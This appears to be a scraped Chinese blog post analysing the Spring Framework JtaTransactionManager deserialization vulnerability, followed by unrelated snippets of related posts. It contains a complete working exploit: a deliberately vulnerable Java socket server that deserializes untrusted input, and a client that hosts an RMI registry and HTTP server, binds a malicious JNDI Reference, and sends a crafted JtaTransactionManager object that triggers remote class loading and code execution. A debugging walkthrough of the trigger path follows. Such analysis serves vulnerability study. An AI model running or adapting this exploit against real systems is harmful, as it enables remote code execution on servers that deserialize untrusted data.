2. 程式人生 > >Spring framework 反序列化的漏洞

Spring framework 反序列化的漏洞

阿新 發佈:2018-12-28

理解這個漏洞需要先看freebuff上的jdni的小例子。這裡就不看了。
Server端程式碼:

imort java.io.*;
import java.net.*;
public class ExploitableServer {
    public static void main(String[] args) {
        try {
        //本地監聽1234埠
            ServerSocket serverSocket = new ServerSocket(1234);
            System.out.println("Server started on port "+serverSocket.getLocalPort());
            while(true) {
                Socket socket=serverSocket.accept();
                System.out.println("Connection received from "+socket.getInetAddress());                
                ObjectInputStream objectInputStream = new ObjectInputStream(socket.getInputStream());
                try {
                //執行接收到類的readObject方法
                    Object object = objectInputStream.readObject();
                    System.out.println("Read object "+object);                                  
                } catch(Exception e) {
                    System.out.println("Exception caught while reading object");                                    
                    e.printStackTrace();
                }               
            }
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}

client端:

import java.io.*;
import java.net.*;
import java.rmi.registry.*;
import com.sun.net.httpserver.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;


public class ExploitClient {
    public static void main(String[] args) {
        try {
            String serverAddress = "127.0.0.1";
            int port = Integer.parseInt("1234");
            String localAddress= "127.0.0.1";

            System.out.println("Starting HTTP server");   //開啟80埠服務
            HttpServer httpServer = HttpServer.create(new InetSocketAddress(81), 0);
            httpServer.createContext("/",new HttpFileHandler());
            httpServer.setExecutor(null);
            httpServer.start();
            
            System.out.println("Creating RMI Registry"); //繫結RMI服務到 1099埠 Object  提供惡意類的RMI服務
            Registry registry = LocateRegistry.createRegistry(1099);
            /*
            java為了將object物件儲存在Naming或者Directory服務下,
            提供了Naming Reference功能,物件可以通過繫結Reference儲存在Naming和Directory服務下,
            比如(rmi,ldap等)。在使用Reference的時候,我們可以直接把物件寫在構造方法中,
            當被呼叫的時候,物件的方法就會被觸發。理解了jndi和jndi reference後,
            就可以理解jndi注入產生的原因了。
             */ //繫結本地的惡意類到1099埠
            Reference reference = new javax.naming.Reference("ExportObject","ExportObject","http://"+serverAddress+":81"+"/");
            ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(reference);
            registry.bind("Object", referenceWrapper);

            System.out.println("Connecting to server "+serverAddress+":"+port); //連線伺服器1234埠
            Socket socket=new Socket(serverAddress,port);
            System.out.println("Connected to server");
            String jndiAddress = "rmi://"+localAddress+":1099/Object";

            //JtaTransactionManager 反序列化時的readObject方法存在問題 //使得setUserTransactionName可控,遠端載入惡意類
            //lookup方法會例項化惡意類,導致執行惡意類無參的構造方法
            org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager();
            object.setUserTransactionName(jndiAddress);
            
            System.out.println("Sending object to server...");
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream());
            objectOutputStream.writeObject(object);
            objectOutputStream.flush();
            while(true) {
                Thread.sleep(1000);
            }
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}

server與client互動流程:
Alt text
漏洞觸發點:
Alt text
下斷點除錯,前面client都是繫結操作,直到執行到43行,將惡意的rmi地址寫入:
Alt text
46行將惡意類傳送到Server端,server端執行JtaTransactionManager類的readObject:
Alt text
跟到616行:
Alt text
f7跟到173行:
Alt text
繼續f7跟到247行,呼叫了looup方法:
Alt text
繼續跟進94行,name 傳進的值是之前繫結的惡意類的地址,lookup方法會呼叫惡意類的構造方法。
Alt text
跟到惡意類構造方法,觸發RCE.
Alt text
參考連結:
https://www.freebuf.com/vuls/115849.html
https://paper.seebug.org/312/

相關推薦

Spring framework 序列漏洞

理解這個漏洞需要先看freebuff上的jdni的小例子。這裡就不看了。 Server端程式碼: imort java.io.*; import java.net.*; public class ExploitableServer { public static void main(String[]

【原創】Spring Data Redis <=2.0.3序列漏洞

反序列化 默認 用戶 字節碼 href http strong comm ons Spring Data Redis隸屬於Spring Data家族, 提供簡單易用的方式來訪問Redis緩存。 Spring Data Redis在往Redis裏面寫數據的時候,默認會先對數據

php序列漏洞繞過魔術方法 __wakeup

prot poc cte enc repo private 成員 .html blank 0x01 前言 前天學校的ctf比賽,有一道題是關於php反序列化漏洞繞過wakeup,最後跟著大佬們學到了一波姿勢。。 0x02 原理 序列化與反序列化簡單介紹 序列化:把復雜的數據

小白審計JACKSON序列漏洞

ces serialize 簡單 mage 簡單介紹 rac led 代碼審計 ble 1. JACKSON漏洞解析 poc代碼:main.java import com.fasterxml.jackson.databind.ObjectMapper; import co

PHP序列漏洞學習

exc tof target fun 反序 ring 內容 style 字符串 serialize:序列化 unserialize: 反序列化 簡單解釋: serialize 把一個對象轉成字符串形式, 可以用於保存 unserialize 把serialize序列化後的字

XMLDecoder序列漏洞

xmldecoder java 反序列化 Java 調用XMLDecoder解析XML文件的時候,存在命令執行漏洞。樣例XML文件如下所示:<?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_131" class

PHP序列漏洞

發生 arc arr 再看 記錄 php7 數據化 tostring 又能 聊一聊PHP反序列化漏洞 2016年11月4日 反序列化漏洞在各種語言中都較為常見,下面就簡單聊一聊PHP的反序列化漏洞(PHP對象註入)。第一次了解這個洞還是在某次ctf上,就簡單記錄下個人理解

Typecho 序列漏洞導致前臺 getshell

typecho 反序列化漏洞導致前臺 getshell前言最早知道這個漏洞是在一個微信群裏,說是install.php文件裏面有個後門,看到別人給的截圖一看就知道是個PHP反序列化漏洞,趕緊上服務器看了看自己的博客,發現自己也中招了,相關代碼如下:然後果斷在文件第一行加上了die:<?php die(‘

java序列漏洞的檢測

spa div ria comm span Coding python odin ima 1、首先下載常用的工具ysoserial 這邊提供下載地址:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-

WebLogic 10.3.6.0 升級序列漏洞補丁

成功 wget命令 下載 攻擊 generic 價格 server move 被黑 由於最近比特幣被炒到近乎不可思議的價格,所以網絡上的肉雞都被黑產們一個個培養成了挖礦雞。今兒就聊聊如何進行WebLogic10的反序列化漏洞的升級方法。 1、修改bsu.sh 把內存

java序列漏洞原理研習

java程序 out import 修改 sed 判斷 pub 發現 commons 零、Java反序列化漏洞   java的安全問題首屈一指的就是反序列化漏洞,可以執行命令啊,甚至直接getshell,所以趁著這個假期好好研究一下java的反序列化漏洞。另外呢,組裏多位大

Java序列漏洞的挖掘、攻擊與防禦

body per 所有 http 操作 www except ride 方法 一、Java反序列化漏洞的挖掘 1、黑盒流量分析: 在Java反序列化傳送的包中,一般有兩種傳送方式,在TCP報文中,一般二進制流方式傳輸,在HTTP報文中,則大多以base64傳輸。因而在流量中

weblogic AND jboss 序列漏洞

我們 cat logic -- ram icc 訪問 web訪問 驗證 C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF serve

CVE-2017-12149JBoss 序列漏洞利用

命令行 edi AC 頁面 server cto dex form 文件頭 CVE-2017-12149 漏洞描述 互聯網爆出JBOSSApplication Server反序列化命令執行漏洞(CVE-2017-12149),遠程攻擊者利用漏洞可在未經任何身份驗證的服務器

ref:PHP序列漏洞成因及漏洞挖掘技巧與案例

tmp 問題 文章 extend === 代碼 簡單的 ted IE ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧與案例 一、序列化和反序列化 序列化和反序列化的目的是使得程序間傳輸對象會更加方

應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬(Shiro序列漏洞和ddg挖礦木馬)

var vpc hist crontab 使用 8.4 wget 序列化 coo 背景 某公司線上服務器意外發現一個Apache Shiro 反序列化漏洞,可以直接GetShell。出於做安全的謹慎,馬上出現場應急,確認漏洞。該漏洞存在在cookie字段中的remembe

weblogic序列漏洞 cve-2018-3245

type 技術 序列化 int live 查看 efs intent loader weblogic反序列化漏洞 CVE-2018-3245 0x00 針對cve-2018-2893的修復 針對JRMP反序列化修復的方式依舊是增加黑名單:黑名單package:java.rm

記錄WebLogic(CVE-2017-10271)序列漏洞找WEBSHELL地址

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址 首先,郭姓某牛丟來了一個有weblogic漏洞的地址http://x.x.x.x:7001 說用k8的weblogic2628去getshell不能連結shell,我也試了下,好像確實不能連

Java序列漏洞:在受限環境中從漏洞發現到獲取反向Shell

前言 Java反序列化漏洞可以說是Java安全的一塊心病,近年來更是在安全界“出盡風頭”。其實說到Java反序列化的問題,早在2015年年初的在AppSecCali大會上,兩名安全研究人員Chris Frohoff 和 Gabriel Lawrence發表了一篇題為《Marshallin

Weblogic 小於10.3.6 'wls-wsat' XMLDecoder 序列漏洞(CVE-2017-10271)

之前本來複現過一次的,結果後來資料丟了,只好再來一遍。 沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。 12.2.1.2.0下載: https://download.oracle.com/otn/nt/middleware/12c/12212/fmw_